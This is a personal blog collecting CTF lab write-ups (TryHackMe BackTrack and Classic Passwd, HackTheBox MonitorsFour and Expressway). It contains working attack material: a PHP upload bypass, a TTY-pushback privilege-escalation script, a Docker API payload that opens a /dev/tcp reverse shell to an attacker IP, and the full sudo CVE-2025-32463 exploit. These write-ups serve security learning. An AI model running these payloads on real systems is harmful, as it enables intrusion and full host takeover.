ED25519 key fingerprint is: SHA256:0083wvLGeoh6f0CIO11O0TYxt6R1Hr7AB8xEhvgtm+A
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.48.159.219' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
wilbur@10.48.159.219's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-173-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information disabled due to load higher than 1.0

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

1 additional security update can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm


The list of available updates is more than a week old.
To check for new updates run: sudo apt update


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

-Xmx1024M: command not found
wilbur@Backtrack:~$ 


we forward the port we can access the web app 
its a image upload like site 
we can login using given creds and try to upload php rev shell

since it only accepts only jpg , png , jpeg and gif are allowed lets try to bypass 
by double extention method and it worked

we uploaded the shell and started listener 
but it has some restriction it cant execute on upload dir and ater cheking

the apache2.conf file
and 
        Options FollowSymLinks
        AllowOverride None
        Require all denied



        AllowOverride None
        Require all granted



        Options Indexes FollowSymLinks
        AllowOverride None
        Require all granted


        php_flag engine off
        AddType application/octet-stream php php3 php4 php5 phtml phps phar phpt

#
#       Options Indexes FollowSymLinks
#       AllowOverride None
#       Require all granted
#

see we dont have any option to execute since php render engine off

so instead of upload to uplaod dir we upload to root dir 
for this we use burp decoder and encode 
and set the image path


POST /dashboard.php HTTP/1.1
Host: 127.0.0.1:9999
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------34524534811715939549149865964
Content-Length: 4144
Origin: http://127.0.0.1:9999
Connection: keep-alive
Referer: http://127.0.0.1:9999/dashboard.php
Cookie: PHPSESSID=23m504fv795ejdb1gdkdpnillr
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

-----------------------------34524534811715939549149865964
Content-Disposition: form-data; name="image"; filename="%25%32%65%25%32%65%25%32%66shell.png.php"
Content-Type: application/x-php

and we got the shell

┌──(kali㉿blackXploit)-[~/Downloads/backtrack]
└─$ nc -lvnp 1337             
listening on [any] 1337 ...
connect to [192.168.146.172] from (UNKNOWN) [10.48.159.219] 37148
Linux Backtrack 5.4.0-173-generic #191-Ubuntu SMP Fri Feb 2 13:55:07 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 06:45:56 up  1:02,  1 user,  load average: 13.43, 7.63, 3.35
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
wilbur   pts/3    192.168.146.172  06:25   10:20   0.04s  0.04s -bash
uid=1003(orville) gid=1003(orville) groups=1003(orville)
/bin/sh: 0: can't access tty; job control turned off
$ ls
bin
boot
data
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
vagrant
var
$ id
uid=1003(orville) gid=1003(orville) groups=1003(orville)
$ 

here we got flag2.txt

next thing is to check for getting root using linpeas and pspy64 to view running process without root

and i found



the thing is that while running the su command, the root user does not use the -P flag, meaning no new PTY is allocated.

This situation is vulnerable to TTY Pushback. Essentially, we can stop the shell running as the orville user by sending a SIGSTOP signal to it, allowing focus to shift to the root shell. After that, we can use the TIOCSTI operation with the ioctl to send inputs to the root shell. You can read more about the vulnerability 
https://www.errno.fr/TTYPushback.html

if you unable to understand let me clear it :

1. What su normally does

su switches from a normal user to root.

Normally, root should get its own terminal session (PTY).

That separation prevents lower-privileged users from interfering.

2. What went wrong here

Root ran su without creating a new PTY.

That means:

The normal user shell and the root shell share the same terminal.

This is unsafe.

Think of it like:

Two people accidentally using the same keyboard and screen, one of them being root.

3. Why this is dangerous (TTY Pushback)

Because both shells share the same terminal:

You can pause the normal user shell (using a stop signal).

When that shell stops, the terminal focus stays active.

The root shell is still listening to that terminal.

Anything typed or “sent” to the terminal can now be received by root.

This is called TTY Pushback.

4. What “pushback” means in simple terms

The terminal has an input buffer.

Input meant for your shell can be pushed into root’s shell instead.

Root ends up executing commands without directly typing them.

No password cracking.
No kernel exploit.
Just terminal confusion.

for this exploit

First, we will create a Python script that does this and runs the chmod +s /bin/bash command on the root shell at /dev/shm/shell.py

on my kali machine
#!/usr/bin/env python3
import fcntl
import termios
import os
import sys
import signal

os.kill(os.getppid(), signal.SIGSTOP)

for char in 'chmod +s /bin/bash\n':
    fcntl.ioctl(0, termios.TIOCSTI, char)

┌──(kali㉿blackXploit)-[~]
└─$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [192.168.146.172] from (UNKNOWN) [10.49.146.98] 45536
Linux Backtrack 5.4.0-173-generic #191-Ubuntu SMP Fri Feb 2 13:55:07 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 07:49:38 up 20 min,  1 user,  load average: 0.00, 0.15, 0.21
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
wilbur   pts/1    192.168.146.172  07:30   19:29   0.02s  0.02s -bash
uid=1003(orville) gid=1003(orville) groups=1003(orville)
/bin/sh: 0: can't access tty; job control turned off
$ cd /dev/shm
$ ls
shell.py
shell.py.1
$ rm shell.py
$ rm shell.py.1
$ ls
$ wget http://192.168.146.172:5555/shell.py
--2026-01-26 07:50:14--  http://192.168.146.172:5555/shell.py
Connecting to 192.168.146.172:5555... connected.
HTTP request sent, awaiting response... 200 OK
Length: 181 [text/x-python]
Saving to: 'shell.py'

     0K                                                       100% 51.1M=0s

2026-01-26 07:50:15 (51.1 MB/s) - 'shell.py' saved [181/181]

$ ls
shell.py
$ echo 'python3 /dev/shm/shell.py' > /home/orville/.bashrc 
$ ls -la /bin/bash 
-rwxr-xr-x 1 root root 1183448 Apr 18  2022 /bin/bash [ wait for some sec ]
$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash [ and now check the perm ]
$ bash -i
bash: cannot set terminal process group (639): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.0$ id
id
uid=1003(orville) gid=1003(orville) groups=1003(orville)
bash-5.0$ exit 
exit
exit
$ bash -p
id
uid=1003(orville) gid=1003(orville) euid=0(root) egid=0(root) groups=0(root),1003(orville)
cd /root
ls
flag3.txt
manage.py
snap
cat flag3.txt

██████╗░░█████╗░░█████╗░██╗░░██╗████████╗██████╗░░█████╗░░█████╗░██╗░░██╗
██╔══██╗██╔══██╗██╔══██╗██║░██╔╝╚══██╔══╝██╔══██╗██╔══██╗██╔══██╗██║░██╔╝
██████╦╝███████║██║░░╚═╝█████═╝░░░░██║░░░██████╔╝███████║██║░░╚═╝█████═╝░
██╔══██╗██╔══██║██║░░██╗██╔═██╗░░░░██║░░░██╔══██╗██╔══██║██║░░██╗██╔═██╗░
██████╦╝██║░░██║╚█████╔╝██║░╚██╗░░░██║░░░██║░░██║██║░░██║╚█████╔╝██║░╚██╗
╚═════╝░╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝

THM redact



HTB – MonitorsFour
2025-12-12T00:00:00+00:00
HTB MonitorsFour: From Web App to Windows Host

Target: monitorsfour.htb

Difficulty: Easy

Date: December 12, 2025

This was such a fun box! It taught me about PHP type juggling vulnerabilities, Docker escapes, and how to leverage an exposed Docker API to compromise a Windows host. Let me walk you through exactly how I solved it.



Step 1: Initial Reconnaissance

First things first - let’s see what we’re working with.

Port Scanning

nmap -sC -sV -sT 10.10.11.98


Results: Port 80 (HTTP) was open. and 5985/tcp open  http    syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Directory Enumeration

I fired up dirsearch to find hidden directories:

dirsearch -u http://monitorsfour.htb -x 404


Jackpot! Found /.env - a configuration file that should NEVER be public. Inside were database credentials:

DB_HOST=mariadb
DB_NAME=monitorsfour_db  
DB_USER=monitorsdbuser
DB_PASS=f*********



  💡 Pro tip: Always check for .env, .git, and backup files. Developers forget about them all the time.


Subdomain Discovery

Next, I checked for subdomains using ffuf:

ffuf -u http://monitorsfour.htb/ -H "Host: FUZZ.monitorsfour.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt


Found: cacti.monitorsfour.htb running Cacti version 1.2.28 (a network monitoring tool).



Step 2: Exploiting PHP Type Juggling

Finding the Vulnerable Endpoint

While exploring the main site, I discovered a /user endpoint:

curl http://monitorsfour.htb/user


Response: {"error":"Missing token parameter"}

When I added a fake token:

curl http://monitorsfour.htb/user?token=AAAA


Response: {"error":"Invalid or missing token"}

Understanding PHP Type Juggling

Here’s where it gets interesting. PHP has this quirk with loose comparisons (== vs ===). When developers use ==, PHP tries to convert types automatically:


  "0" == 0 → true
  "0e1234" == 0 → true (scientific notation!)
  "" == 0 → true
  "00" == 0 → true


If the token validation uses something like if ($token == $valid_token), we can bypass it!

Testing the Bypass

I created a quick wordlist:

0
00
0e1234
0e9999
true
false



Then tested each one:

for token in 0 00 0e1234 ""; do
  echo "Testing: $token"
  curl -s "http://monitorsfour.htb/user?token=$token"
  echo ""
done


Success! Multiple tokens worked: 0, 00, 0e1234, and even empty string.

Extracting User Data

curl -s "http://monitorsfour.htb/user?token=0" | python3 -m json.tool


Got back a list of users with MD5 hashed passwords, including the admin user!



Step 3: Cracking the Admin Hash

Using John the Ripper

I saved the admin hash and fired up John:

echo "56b32eb43e6f15395f6c46c1c9e1cd36" > hash.txt
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt


Cracked in 3 seconds: wonderful1

Testing the Credentials

Tried on the main site - no luck. But then I remembered the Cacti subdomain!

marcus:wonderful1 on cacti.monitorsfour.htb → Success! 🎉



Step 4: Exploiting Cacti for Initial Shell

Finding the Right Exploit

Cacti 1.2.28 was vulnerable to CVE-2025-24367 - a Graph Template Injection vulnerability. Essentially, admins can create graph templates that execute arbitrary commands through rrdtool.

Found a working PoC on GitHub:

git clone https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC.git
cd CVE-2025-24367-Cacti-PoC


Getting a Reverse Shell

Set up my listener:

nc -lnvp 60001


Ran the exploit:

python3 exploit.py -u marcus -p wonderful1 -url http://cacti.monitorsfour.htb -i 10.10.14.77 -l 60001


Output:
[+] Cacti Instance Found!
[+] Login Successful!
[+] Got graph ID: 226
[+] Hit timeout, looks good for shell, check your listener!


And boom! Got a shell as www-data:

www-data@821fbd6a43fa:~/html/cacti$




Step 5: Container Enumeration

Initial Exploration

whoami
# www-data

hostname
# 821fbd6a43fa  (Docker container!)

pwd
# /var/www/html/cacti


I was inside a Docker container. Let’s grab the user flag first:

cd /home/marcus
cat user.txt
# [USER FLAG CAPTURED! ✅]


Network Discovery

Checked the network configuration:

ip addr show
# 172.18.0.3 (my container)

ip route
# default via 172.18.0.1 dev eth0 
# 172.18.0.0/16 dev eth0

cat /etc/resolv.conf
# nameserver 127.0.0.11
# ExtServers: [host(192.168.65.7)]


This revealed:

  172.18.0.3: Cacti container (me)
  172.18.0.2: MariaDB container
  192.168.65.7: Docker host (Windows!)


Scanning the Host

I needed a network scanner. Downloaded fscan to the container:

# On my Kali
wget https://github.com/shadow1ng/fscan/releases/download/1.8.1/fscan_amd64 -O /tmp/fscan
chmod +x /tmp/fscan
python3 -m http.server 8000

# On target
curl http://10.10.14.77:8000/fscan -o /tmp/fscan
chmod +x /tmp/fscan


Ran the scan:

/tmp/fscan -h 192.168.65.7 -p 2375-2380,22,80,443,3389,5985,5986,8080-8081,9000-9001 -np -t 200


Critical finding:
192.168.65.7:2375 open
[+] http://192.168.65.7:2375 poc-yaml-docker-api-unauthorized-rce


Port 2375 = Unauthenticated Docker API! This is our ticket to the host.



Step 6: Docker API Escape (CVE-2025-9074)

Understanding the Vulnerability

Docker Desktop for Windows (older versions) exposes the Docker daemon on port 2375 within the WSL2 network. This lets ANY container control the Docker engine.

The attack plan:

  Create a new privileged container
  Mount the Windows C: drive inside it
  Get a reverse shell with full host access


Verifying Docker API Access

curl -s http://192.168.65.7:2375/version
# Got version info - API is wide open!


Listing Available Images

curl -s http://192.168.65.7:2375/images/json


Found: docker_setup-nginx-php:latest

Creating the Malicious Container

Set up another listener on my Kali:

nc -lnvp 60002


Created a JSON payload to mount the host’s C: drive:

YOUR_IP="10.10.14.77"

curl -H 'Content-Type: application/json' \
  -d "{\"Image\":\"docker_setup-nginx-php:latest\",\"Cmd\":[\"/bin/bash\",\"-c\",\"bash -i >& /dev/tcp/$YOUR_IP/60002 0>&1\"],\"HostConfig\":{\"Binds\":[\"/mnt/host/c:/host_root\"]}}" \
  http://192.168.65.7:2375/containers/create -o response.json


Got back a container ID. Started it:

# Extract container ID from response
cid=$(grep -o '"Id":"[^"]*"' response.json | cut -d'"' -f4)

# Start the container
curl -X POST http://192.168.65.7:2375/containers/$cid/start




Step 7: Root Flag Capture

Getting the Privileged Shell

My listener caught the connection:

nc -lnvp 60002
# Connection from 10.10.11.98
root@5d42e10b2055:/var/www/html#


I’m now root with the entire Windows C: drive mounted at /host_root!

Finding the Root Flag

ls /host_root/Users/Administrator/Desktop/
# desktop.ini  root.txt


There it is! Reading it:

head /host_root/Users/Administrator/Desktop/root.txt
# [ROOT FLAG CAPTURED! ✅]



  📝 Note: I used head instead of cat due to some terminal encoding issues.




Summary of Tools Used


  
    
      Tool
      Purpose
    
  
  
    
      Nmap
      Port scanning
    
    
      Dirsearch
      Directory enumeration
    
    
      FFUF
      Subdomain fuzzing
    
    
      cURL
      API testing and exploitation
    
    
      John the Ripper
      Password cracking
    
    
      Netcat
      Reverse shells
    
    
      fscan
      Network scanning from container
    
    
      CVE-2025-24367 Exploit
      Cacti RCE
    
    
      Docker API
      Container escape
    
  




Attack Chain Visualization

1. .env file leak → DB credentials
2. PHP type juggling → User data dump
3. MD5 crack → Cacti access (marcus:wonderful1)
4. CVE-2025-24367 → Shell as www-data in container
5. Network scan → Docker API on port 2375
6. Docker API abuse → Privileged container with C: mount
7. Root shell → Complete Windows host compromise


Happy hacking! 🚀


HTB – Expressway
2025-12-10T00:00:00+00:00
Expressway: HackTheBox Writeup

1. Initial Reconnaissance

1.1 TCP Port Scan
I began with a standard TCP port scan using RustScan, which revealed only one open port:

PORT   STATE SERVICE
22/tcp open  ssh


The limited results suggested we might be missing services running on UDP ports, which is common for VPN endpoints.

1.2 UDP Port Discovery
A focused UDP scan revealed the true nature of the target:

sudo nmap -sU --top-port 100 10.10.11.87
PORT     STATE         SERVICE
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
500/udp  open          isakmp
4500/udp open|filtered nat-t-ike


Key Finding: Ports 500/UDP (ISAKMP/IKE) and 4500/UDP (NAT-T) were identified. These ports are characteristic of IPsec VPN implementations, immediately shifting our focus to VPN-related attacks.

2. VPN Enumeration with IKE-SCAN

2.1 Initial Fingerprinting
Using ike-scan provided crucial configuration details:

ike-scan -M 10.10.11.87


Results:

  Mode: Main Mode (not Aggressive Mode)
  Authentication: PSK (Pre-Shared Key) with XAUTH
  Encryption: 3DES (outdated and weak)
  Hash: SHA1
  DH Group: modp1024
  Vendor IDs: XAUTH and Dead Peer Detection v1.0


2.2 The Aggressive Mode Breakthrough
While Main Mode doesn’t leak crackable hashes, I tested Aggressive Mode anyway:

ike-scan -A 10.10.11.87


Critical Discovery: The target did respond to Aggressive Mode requests, revealing:

  A crackable PSK hash
  User identity: ike@expressway.htb


This was the vulnerability: the VPN was configured to accept both Main Mode and Aggressive Mode, with Aggressive Mode leaking authentication material.

3. Cracking the VPN Credentials

3.1 Hash Extraction
I extracted the PSK hash for offline cracking:

ike-scan -A --pskcrack 10.10.11.87 > hash.txt


3.2 Password Recovery
Using psk-crack with the rockyou wordlist:

psk-crack -d /usr/share/wordlists/rockyou.txt hash.txt


Result: Password recovered: freakingrockstarontheroad

4. Initial Access via SSH

4.1 Testing Credentials
Attempted SSH login with the cracked password:

ssh ike@10.10.11.87
Password: freakingrockstarontheroad


Success: Gained access as user ike.

4.2 User Flag Capture
ike@expressway:~$ cat user.txt



5. Privilege Escalation Analysis

5.1 System Enumeration
Checked the system configuration:

ike@expressway:~$ cat /etc/os-release
PRETTY_NAME="Debian GNU/Linux forky/sid"


5.2 Sudo Version Check
The key discovery:

ike@expressway:~$ sudo --version
Sudo version 1.9.17


Vulnerability Identified: Sudo 1.9.17 is vulnerable to CVE-2025-32463 (“Sudo Chwoot”), a local privilege escalation vulnerability.

5.3 Exploit Discovery
i search on github and found https://github.com/kh4sh3i/CVE-2025-32463/

#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
#                  @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > woot1337.c<
#include 

__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}


then just clone this into machine and boom.

6.1 Running the Exploit
ike@expressway:~$ bash exploit.sh
woot!
root@expressway:/#


6.2 Root Flag Capture
root@expressway:/root# cat root.txt



The script exploited the Sudo vulnerability by:

  Creating a malicious shared library
  Manipulating the chroot environment
  Tricking Sudo into loading the library during hostname resolution


7. Technical Analysis of CVE-2025-32463

Vulnerability Mechanism
The vulnerability exists in Sudo’s hostname validation when using the -h flag:


  Flawed Logic: When hostname validation fails, Sudo falls back to gethostname() system call
  Controllable Path: The gethostname() resolution can be influenced via nsswitch.conf
  Library Injection: An attacker can force Sudo to load a malicious NSS module


Exploit Script Breakdown
The exploit worked by:


  Creating a Malicious Library: Compiled C code with constructor attribute
  Fake Environment: Created a chroot environment with manipulated nsswitch.conf
  Triggering the Bug: Used sudo -R to trigger the vulnerable code path
  Automatic Execution: The malicious library’s constructor ran with root privileges


9. Attack Path Summary


  Discovery: UDP scan → VPN services identified
  Enumeration: IKE-scan → Aggressive Mode enabled
  Exploitation: PSK hash extraction → Password cracking
  Initial Access: SSH with cracked credentials
  Privilege Escalation: Sudo vulnerability → Root access



THM-Classic Passwd Challenge
2025-11-16T00:00:00+00:00


Classic Passwd - Medium


room link : https://tryhackme.com/room/classicpasswd

First of all, same thing again - I don’t know why this challenge is categorized under medium, it should be under easy challenge. In this writeup, I will provide no messy tools and all that complicated stuff. Let’s analyze it simply.

After getting the task file, first I run:

file Challenge_1609966715991.Challenge 


Output:
Challenge_1609966715991.Challenge: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b80ce38cb25d043128bc2c4e1e122c3d4fbba7f7, for GNU/Linux 3.2.0, not stripped


So it’s an ELF file.

Then I just try to run it, so I give permission with:

chmod +x Challenge_1609966715991.Challenge


Then after this it asks for username which I don’t have.

Then I use strings command to see which library and strings are used here:

strings Challenge_1609966715991.Challenge 

strcpy
exit
__isoc99_scanf
puts
printf
__cxa_finalize
strcmp
__libc_start_main
libc.so.6
GLIBC_2.7
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
Made by H
4non
https://H
github.cH
om/n0obiH
AGB6js5dH
9dkGf
[]A\A]A^A_
Insert your username: 
Welcome
Authentication Error
THM{ %d %d }
;*3$"
GCC: (Debian 10.2.0-16) 10.2.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
Challenge.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
strcpy@@GLIBC_2.2.5
puts@@GLIBC_2.2.5
vuln
_edata
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
strcmp@@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
__isoc99_scanf@@GLIBC_2.7
exit@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

Notable strings found:

  It uses strcmp which is comparing the user provided username with actual one
  Various library functions
  String “AGB6js5d9dkGf” caught my attention
  Authentication messages: “Insert your username:”, “Welcome”, “Authentication Error”
  Flag format: “THM{ % d % d}”


Then for dynamic analysis I use ltrace:

ltrace ./Challenge_1609966715991.Challenge 

note : 
Ltrace is a command-line tool used in Linux to trace library calls made by a program during its execution. It helps developers and system administrators debug and troubleshoot issues by showing how a program interacts with shared libraries.
Output:
printf("Insert your username: ") = 22
__isoc99_scanf(0x5644d2e6c01b, 0x7ffd0e5eab80, 0, 0Insert your username: admin) = 1
strcpy(0x7ffd0e5eaaf0, "admin") = 0x7ffd0e5eaaf0
strcmp("admin", "AGB6js5d9dkG7") = 32
puts("\nAuthentication Error") = 22
exit(0 
+++ exited (status 0) +++


After this we can clearly see it compares username with “AGB6js5d9dkG7”.

After that I provide this value as username and boom we got it:

./Challenge_1609966715991.Challenge 
Insert your username: AGB6js5d9dkG7

Welcome
THM{redacted}


Flag: THM{redacted}

for deeper analysis you can use tools like Ghidra or IDA. Thank You

since i am new in reverse engineering stuffs so if i miss anything please suggest me here : sensurajit@proton.me

Tool	Purpose
Nmap	Port scanning
Dirsearch	Directory enumeration
FFUF	Subdomain fuzzing
cURL	API testing and exploitation
John the Ripper	Password cracking
Netcat	Reverse shells
fscan	Network scanning from container
CVE-2025-24367 Exploit	Cacti RCE
Docker API	Container escape

Portfolio | Surajit Sen

HTB – Snapped

Initial Enumeration

Web Enumeration & Subdomain Discovery

Exploiting CVE-2026-27944 (Nginx UI)

Critical Vulnerabilities (2026):

Exploiting the Backup Vulnerability

Decrypting the Backup

SSH Access

Privilege Escalation via CVE-2026-3888

Understanding the Vulnerability

Step 1: The Regular Cleanup (The Trigger)

Step 2: The Race Condition (The Timing)

Step 3: The Bait-and-Switch

Step 4: The Elevation (The Payoff)

System Information

Executing the Exploit

Root Access Achieved

References

HTB – Devarea

Decompiling with jd-gui

juicy file: ServerStarter.java

Critical Observations

Vulnerability Research

XXE Exploitation (CVE-2022-46364)

Exploit Script: CVE-2022-46364.py

Finding Hoverfly Configuration

Hoverfly Dashboard & RCE

Accessing the Dashboard

CVE-2025-54123 - Hoverfly RCE as discovered earlier

Spawning a Reverse Shell

User Flag

Privilege Escalation Analysis

Root Exploitation

Setting Up a Clean Shell

Creating the Malicious Payload

Killing Bash Processes

Deploying the Payload

Triggering the Exploit

Checking for SUID Python3

Spawning Root Shell

Flag

HTB – CCTV

Recon

CVE-2026-20841

References

Details

Overview

Attack Flow

Proof of Concept

Mitigation

HTB-Facts

Initial Reconnaissance

Scan Results

Web Enumeration

Exploitation - CVE-2025-2304

AWS Credentials Discovery

SSH Key Extraction

Cracking SSH Key

Getting User Access

Privilege Escalation to Root

CVE-2026-24061

Telnet’s Backdoor: How a Simple Argument Injection Let Anyone Be Root

THM - BackTrack

the manager runs on port 8080

HTB – MonitorsFour

HTB MonitorsFour: From Web App to Windows Host

Step 1: Initial Reconnaissance

Port Scanning

Directory Enumeration

Subdomain Discovery

Step 2: Exploiting PHP Type Juggling

Finding the Vulnerable Endpoint

Understanding PHP Type Juggling

Testing the Bypass

Extracting User Data

Step 3: Cracking the Admin Hash

Using John the Ripper

Testing the Credentials

Step 4: Exploiting Cacti for Initial Shell

juicy file: `ServerStarter.java`

Exploit Script: `CVE-2022-46364.py`